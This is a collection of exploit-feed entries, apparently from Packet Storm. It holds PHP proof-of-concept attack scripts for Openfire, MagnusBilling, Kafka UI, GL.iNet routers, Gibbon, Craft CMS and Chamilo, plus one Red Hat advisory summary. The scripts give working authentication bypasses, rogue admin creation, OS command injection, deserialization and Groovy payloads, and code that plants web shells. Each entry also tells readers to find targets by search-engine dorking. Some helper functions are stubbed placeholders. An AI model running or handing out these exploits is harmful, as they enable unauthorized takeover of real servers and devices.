Openfire version 4.8.0 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : Openfire release 4.8.0 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.igniterealtime.org/projects/openfire/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 115 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenfireExploit{    private $targetUrl;    private $adminUsername;    private $adminPassword;    private $pluginName;    private $csrfToken;    public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null)    {        $this->targetUrl = rtrim($targetUrl, '/') . '/';        $this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15);        $this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10);        $this->pluginName = $pluginName ?? $this->generateRandomString(8, 15);    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    private function generateRandomPassword($minLength, $maxLength)    {        return bin2hex(random_bytes(rand($minLength, $maxLength) / 2));    }    private function sendRequest($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        return curl_exec($ch);    }    private function getCsrfToken()    {        $response = $this->sendRequest('GET', 'login.jsp');        preg_match('/csrf=([^;]+)/', $response, $matches);        return $matches[1] ?? null;    }    private function authBypass()    {        $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp');        // Check if we can access the user-groups.jsp page        return $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp') !== false;    }    private function addAdminUser()    {        $this->csrfToken = $this->getCsrfToken();        $data = http_build_query([            'csrf' => $this->csrfToken,            'username' => $this->adminUsername,            'password' => $this->adminPassword,            'passwordConfirm' => $this->adminPassword,            'isadmin' => 'on',            'create' => 'Create User'        ]);        return $this->sendRequest('POST', 'setup/setup-s/../../../../user-create.jsp', $data);    }    private function uploadPlugin($pluginFilePath)    {        $this->csrfToken = $this->getCsrfToken();        $cfile = new CURLFile($pluginFilePath);        $data = [            'uploadfile' => $cfile,            'csrf' => $this->csrfToken        ];        $headers = ['Content-Type: multipart/form-data'];        return $this->sendRequest('POST', 'plugin-admin.jsp', $data, $headers);    }    public function exploit()    {        if ($this->authBypass()) {            echo "Authentication bypass successful.\n";            if ($this->addAdminUser()) {                echo "Admin user '{$this->adminUsername}' added successfully.\n";                // Prepare plugin JAR file path                $pluginJarPath = '/path/to/plugin.jar'; // Replace with actual path to the JAR file                if ($this->uploadPlugin($pluginJarPath)) {                    echo "Plugin uploaded successfully.\n";                } else {                    echo "Failed to upload plugin.\n";                }            } else {                echo "Failed to add admin user.\n";            }        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new OpenfireExploit('http://target-openfire-url.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Openfire 4.8.0 Code Injection

MagnusBilling version 6.x suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 6.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 6.x Code Injection 

Kafka UI version 0.7.1 suffers from a remote code injection vulnerability.

    =============================================================================================================================================| # Title     : Kafka UI 0.7.1 Code Injection Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/provectus/kafka-ui/                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 159 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass KafkaUIExploit {    private $target;    private $version;    private $cluster;    private $new_topic;    public function __construct($target) {        $this->target = $target;    }    public function vuln_version() {        $uri = $this->normalize_uri('/actuator/info');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            if (!empty($json_response)) {                if (isset($json_response['build']['version'])) {                    $this->version = ltrim($json_response['build']['version'], 'v');                } elseif (isset($json_response['git']['commit']['id'])) {                    // Git commit versioning (this part should check with a local list if needed)                    $git_commit_id = substr($json_response['git']['commit']['id'], 0, 7);                    // Implement logic to map git commit to version                }                return version_compare($this->version, '0.7.1', '<=') && version_compare($this->version, '0.4.0', '>=');            }        }        return false;    }    public function get_cluster() {        $uri = $this->normalize_uri('/api/clusters');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            foreach ($json_response as $cluster) {                if ($cluster['status'] == 'online' || $cluster['topicCount'] > 0) {                    return $cluster['name'];                }            }        }        return null;    }    public function create_topic($cluster) {        $topic_name = $this->random_string(8);        $post_data = json_encode([            'name' => $topic_name,            'partitions' => 1,            'replicationFactor' => 1,            'configs' => [                'cleanup.policy' => 'delete',                'retention.bytes' => '-1'            ]        ]);        $uri = $this->normalize_uri("/api/clusters/$cluster/topics");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            return $json_response['name'];        }        return null;    }    public function delete_topic($cluster, $topic) {        $uri = $this->normalize_uri("/api/clusters/$cluster/topics/$topic");        $response = $this->send_request('DELETE', $uri, 'application/json');        return $response['status_code'] == 200;    }    public function produce_message($cluster, $topic) {        $post_data = json_encode([            'partition' => 0,            'key' => 'null',            'content' => 'null',            'keySerde' => 'String',            'valueSerde' => 'String'        ]);        $uri = $this->normalize_uri("/api/clusters/$cluster/topics/$topic/messages");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        return $response['status_code'] == 200;    }    public function execute_command($cmd) {        $payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"$cmd\").redirectErrorStream(true).start()";        $uri = $this->normalize_uri("/api/clusters/{$this->cluster}/topics/{$this->new_topic}/messages");        $params = [            'q' => $payload,            'filterQueryType' => 'GROOVY_SCRIPT',            'attempt' => 2,            'limit' => 100,            'page' => 0,            'seekDirection' => 'FORWARD',            'keySerde' => 'String',            'valueSerde' => 'String',            'seekType' => 'BEGINNING'        ];        return $this->send_request('GET', $uri, 'application/x-www-form-urlencoded', '', $params);    }    public function check() {        if ($this->vuln_version()) {            return "Kafka-ui version: {$this->version} is vulnerable";        }        return "Kafka-ui version is not vulnerable or unknown.";    }    public function exploit() {        $this->cluster = $this->get_cluster();        if (!$this->cluster) {            die("Could not find or connect to an active Kafka cluster.");        }        $this->new_topic = $this->create_topic($this->cluster);        if (!$this->new_topic) {            die("Could not create a new topic.");        }        if (!$this->produce_message($this->cluster, $this->new_topic)) {            die("Failed to trigger Groovy script payload execution.");        }        $this->execute_command('your_command_here'); // Replace with your desired command        if ($this->delete_topic($this->cluster, $this->new_topic)) {            echo "Successfully deleted topic {$this->new_topic}.";        } else {            echo "Could not delete topic {$this->new_topic}. Manual cleanup required.";        }    }    private function send_request($method, $uri, $content_type, $data = '', $params = []) {        // Placeholder for HTTP request logic (curl, file_get_contents, etc.)        // Implement this function with your desired HTTP request library in PHP        return [            'status_code' => 200,            'body' => '{}'        ];    }    private function normalize_uri($path) {        return $this->target . $path;    }    private function random_string($length) {        return bin2hex(random_bytes($length / 2));    }}// Example usage:$exploit = new KafkaUIExploit("http://target.com");echo $exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Kafka UI 0.7.1 Code Injection

Red Hat Security Advisory 2024-7972-03 - An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available. The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products. Red Hat Product Security has rated this update as having a security impact of Critical. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7972.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1)  
Advisory ID:        RHSA-2024:7972-03  
Product:            Red Hat Build of Apache Camel  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7972  
Issue date:         2024-10-10  
Revision:           03  
CVE Names:          CVE-2024-7254  
====================================================================

Summary: 

An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products.  
Red Hat Product Security has rated this update as having a security impact of Critical.

Description:

An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products:  
* CVE-2024-47561 org.apache.avro/avro: Schema parsing may trigger Remote Code Execution (RCE)  
* CVE-2024-7254 com.google.protobuf/protobuf-java: StackOverflow vulnerability in Protocol Buffers

Solution:

CVEs:

CVE-2024-7254

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2313454  
https://bugzilla.redhat.com/show_bug.cgi?id=2316116

Red Hat Security Advisory 2024-7972-03

GL.iNet version 4.4.3 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : GL.iNet network 4.4.3 Code Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gl-inet.com/                                                                                                    |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 158 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GlinetExploit{    private $targetUri;    private $sid;    private $glinet;    public function __construct($targetUri)    {        $this->targetUri = $targetUri;        $this->glinet = [            'model' => null,            'firmware' => null,            'arch' => null        ];    }    private function send_request($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        $options = [            CURLOPT_URL => $this->targetUri . $uri,            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => $method        ];        if ($data) {            $options[CURLOPT_POSTFIELDS] = $data;            $headers[] = 'Content-Type: application/json';        }        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response ? json_decode($response, true) : null;    }    public function check_vuln_version()    {        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => ['', 'ui', 'check_initialized', []]        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result'])) {            $this->glinet['model'] = $res['result']['model'];            $this->glinet['firmware'] = $res['result']['firmware_version'];        }        // Check for vulnerable models and firmware        switch ($this->glinet['model']) {            case 'sft1200':                $this->glinet['arch'] = 'mipsle';                return version_compare($this->glinet['firmware'], '4.3.6', '==');            case 'ar750':            case 'ar750s':                $this->glinet['arch'] = 'mipsbe';                return version_compare($this->glinet['firmware'], '4.3.7', '==');            // Add more cases as per your requirement        }        return false;    }    public function auth_bypass()    {        if (!empty($this->sid)) {            return $this->sid;        }        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'challenge',            'params' => ['username' => 'root']        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result']['nonce'])) {            $nonce = $res['result']['nonce'];            $username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+";            $pw = '0';            $hash = md5("$username:$pw:$nonce");            $postData = json_encode([                'jsonrpc' => '2.0',                'id' => rand(1000, 9999),                'method' => 'login',                'params' => [                    'username' => $username,                    'hash' => $hash                ]            ]);            $res = $this->send_request('POST', '/rpc', $postData);            if ($res && isset($res['result']['sid'])) {                $this->sid = $res['result']['sid'];                return $this->sid;            }        }        return null;    }    public function execute_command($cmd)    {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -base64 -d -A|sh";        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => [                $this->sid,                'logread',                'get_system_log',                ['lines' => '', 'module' => "|{$cmd}"]            ]        ]);        return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]);    }    public function check()    {        if ($this->check_vuln_version()) {            return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}";        }        return 'Not Vulnerable';    }    public function exploit($command)    {        $this->sid = $this->auth_bypass();        if ($this->sid) {            echo "SID: {$this->sid}\n";            echo "Executing: {$command}\n";            $this->execute_command($command);        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new GlinetExploit('https://target-url');$exploit->exploit('ls');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

GL.iNet 4.4.3 Code Injection

Gibbon School Platform version 26.0.00 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Gibbon School Platform 26.0.00 Code Injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://gibbonedu.org/                                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 108 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GibbonExploit{    private $target_uri;    private $username;    private $password;    private $webshell_name;    public function __construct($target_uri, $username, $password, $webshell_name = null)    {        $this->target_uri = $target_uri;        $this->username = $username;        $this->password = $password;        $this->webshell_name = $webshell_name ?: $this->randomString() . '.php';    }    private function send_request($method, $url, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function gibbon_login()    {        $login_url = $this->target_uri . '/login.php?timeout=true';        $data = [            'address' => '',            'method' => 'default',            'username' => $this->username,            'password' => $this->password,            'gibbonSchoolYearID' => '025',            'gibboni18nID' => '0002'        ];        return $this->send_request('POST', $login_url, http_build_query($data));    }    private function construct_form_data($payload)    {        $payload_len = strlen($payload);        $payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:3;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}';        $form_data = [            'address' => '/modules/System Admin/import_run.php',            'mode' => 'sync',            'syncField' => 'N',            'syncColumn' => '',            'columnOrder' => $payload_data,            'columnText' => 'N;',            'fieldDelimiter' => '%2C',            'stringEnclosure' => '%22',            'filename' => $this->randomString() . '.xlsx',            'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"',            'ignoreErrors' => '1',            'Failed' => 'Submit'        ];        return $form_data;    }    public function upload_webshell($b64_payload)    {        $php_payload = "echo \"<?php @eval(base64_decode('$b64_payload'));?>\" > " . $this->webshell_name;        $form_data = $this->construct_form_data($php_payload);        $url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4';        return $this->send_request('POST', $url, http_build_query($form_data));    }    public function execute_php($cmd)    {        $b64_payload = base64_encode($cmd);        $res = $this->upload_webshell($b64_payload);        if (!$res) {            die('Web shell upload error.');        }        // execute the webshell        $url = $this->target_uri . '/' . $this->webshell_name;        return $this->send_request('GET', $url);    }    private function randomString($length = 10)    {        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new GibbonExploit('https://target-site.com', 'username@example.com', 'password');$exploit->gibbon_login();$response = $exploit->execute_php('phpinfo();');echo $response;Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Gibbon School Platform 26.0.00 Code Injection

Craft CMS version 4.4.14 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Craft CMS 4.4.14 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://craftcms.com/                                                                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 116 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass CraftCMSExploit {    private $target_uri;    private $webshell;    private $config = ['upload_tmp_dir' => null, 'document_root' => null];    private $post_param;    private $get_param;    public function __construct($target_uri, $webshell = '') {        $this->target_uri = $target_uri;        $this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';        $this->post_param = $this->generateRandomString(1, 8);        $this->get_param = $this->generateRandomString(1, 8);    }    public function check_phpinfo() {        // Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()        $data = http_build_query([            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'        ]);        $response = $this->sendPostRequest($this->target_uri, $data);        if ($response) {            $this->parsePHPInfo($response);        }    }    private function parsePHPInfo($response) {        // Parses the phpinfo() HTML response to find upload_tmp_dir and document_root        if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);        }        if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['document_root'] = trim($matches[1]);        }    }    public function upload_webshell() {        // Generates an XML payload to upload the webshell via Imagick MSL        $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>        <image>            <read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />            <write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />        </image>";        $form_data = [            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',            'payload' => $payload        ];        $response = $this->sendMultipartPostRequest($this->target_uri, $form_data);        return strpos($response, '502') !== false;    }    public function execute_command($cmd) {        // Executes a command on the server via the uploaded webshell        $payload = base64_encode($cmd);        $data = http_build_query([$this->post_param => $payload]);        return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);    }    private function sendPostRequest($uri, $data) {        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => $data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function sendMultipartPostRequest($uri, $data) {        // Sends a multipart form-data POST request        $boundary = uniqid();        $delimiter = '------' . $boundary;        $post_data = $this->buildMultipartData($data, $delimiter);        $options = [            'http' => [                'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",                'method' => 'POST',                'content' => $post_data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function buildMultipartData($data, $delimiter) {        $post_data = '';        foreach ($data as $name => $content) {            $post_data .= "--$delimiter\r\n";            $post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";            $post_data .= "$content\r\n";        }        $post_data .= "--$delimiter--\r\n";        return $post_data;    }    private function generateRandomString($min, $max) {        $length = rand($min, $max);        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new CraftCMSExploit('http://target-craftcms.com');$exploit->check_phpinfo();if ($exploit->upload_webshell()) {    echo $exploit->execute_command('whoami');}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Craft CMS 4.4.14 Code Injection

Chamilo version 1.11.18 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Chamilo 1.11.18 Code Injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 123 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass ChamiloExploit {    private $targetUri;    private $webshellName;    private $postParam;    public function __construct($targetUri, $webshell = null) {        $this->targetUri = rtrim($targetUri, '/');        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(8)) . '.php';    }    private function soapRequest($cmd) {        $pptSize = rand(720, 1440) . 'x' . rand(360, 720);        return <<<EOS<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"    xmlns:ns1="{$this->targetUri}"    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"    xmlns:xsd="http://www.w3.org/2001/XMLSchema"    xmlns:ns2="http://xml.apache.org/xml-soap"    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">    <SOAP-ENV:Body>        <ns1:wsConvertPpt>            <param0 xsi:type="ns2:Map">                <item>                    <key xsi:type="xsd:string">file_data</key>                    <value xsi:type="xsd:string"></value>                </item>                <item>                    <key xsi:type="xsd:string">file_name</key>                    <value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value>                </item>                <item>                    <key xsi:type="xsd:string">service_ppt2lp_size</key>                    <value xsi:type="xsd:string">{$pptSize}</value>                </item>            </param0>        </ns1:wsConvertPpt>    </SOAP-ENV:Body></SOAP-ENV:Envelope>EOS;    }    public function uploadWebshell() {        $this->postParam = bin2hex(random_bytes(4));        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);        if ($pngWebshell === null) {            return null;        }        $payload = base64_encode($pngWebshell);        $cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    private function injectPhpPayloadPng($phpPayload) {        // Implement your logic to inject PHP payload into a PNG image        // For demonstration purposes, we'll return a dummy PNG data        return pack('H*', '89504E470D0A1A0A...'); // Example PNG header    }    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);        return $response;    }    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -a -d|sh";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    public function check() {        $marker = bin2hex(random_bytes(4));        $res = $this->executeCommand("echo {$marker}");        if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit($payload) {        switch ($payload['type']) {            case 'php':                $res = $this->uploadWebshell();                if (!$res || strpos($res, 'wsConvertPptResponse') === false) {                    throw new Exception('Web shell upload error.');                }                $this->executePhp($payload['encoded']);                break;            case 'unix_cmd':                $this->executeCommand($payload['encoded']);                break;            case 'linux_dropper':                // Implement Linux dropper logic                break;        }    }    private function sendRequest($method, $uri, $ctype, $data) {        // Implement your HTTP request logic here (using cURL or similar)        // For demonstration purposes, return a dummy response        return 'Dummy response';    }}// Usage$exploit = new ChamiloExploit('http://target.com', 'webshell.php');$exploit->check();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Chamilo 1.11.18 Code Injection

Artica Proxy version 4.40 suffers from a code injection vulnerability that provides a reverse shell.

